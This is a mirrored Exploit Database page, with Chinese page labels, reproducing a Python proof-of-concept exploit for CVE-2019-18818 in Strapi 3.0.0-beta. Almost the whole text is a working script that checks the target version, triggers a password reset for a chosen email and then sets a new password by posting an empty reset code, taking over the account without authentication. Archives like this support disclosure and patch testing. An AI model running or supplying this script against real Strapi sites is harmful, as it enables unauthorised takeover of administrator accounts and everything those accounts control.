Strapi 3.0.0-beta – Set Password (Unauthenticated)

• Exploit Database
• 143 阅读

• 作者： David Anglada
  日期： 2021-08-30
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50237/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  # Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated) # Date: 2021-08-29 # Exploit Author: David Anglada [CodiObert] # Vendor Homepage: https://strapi.io/ # Version: 3.0.0-beta # Tested on: Linux # CVE: CVE-2019-18818   #!/usr/bin/python   import requests import sys import json   userEmail = "valid@email.com" strapiUrl = "http://strapi.url" newPassword = "codiobert"   s = requests.Session()   # Get strapi version strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)   print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))   # Validate vulnerable version if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'): # Password reset print("[*] Password reset for user: {}".format(userEmail)) resetPasswordReq={"email":userEmail, "url":"{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)} s.post("{}/".format(strapiUrl), json=resetPasswordReq)   # Set new password print("[*] Setting new password") exploit={"code":{}, "password":newPassword, "passwordConfirmation":newPassword} r=s.post("{}/admin/auth/reset-password".format(strapiUrl), json=exploit)   # Check if the password has changed if "username" in str(r.content): print("[+] New password '{}' set for user {}".format(newPassword, userEmail)) else: print("\033[91m[-] Something went wrong\033[0m") sys.exit(1) else: print("\033[91m[-] This version is not vulnerable\033[0m") sys.exit(1)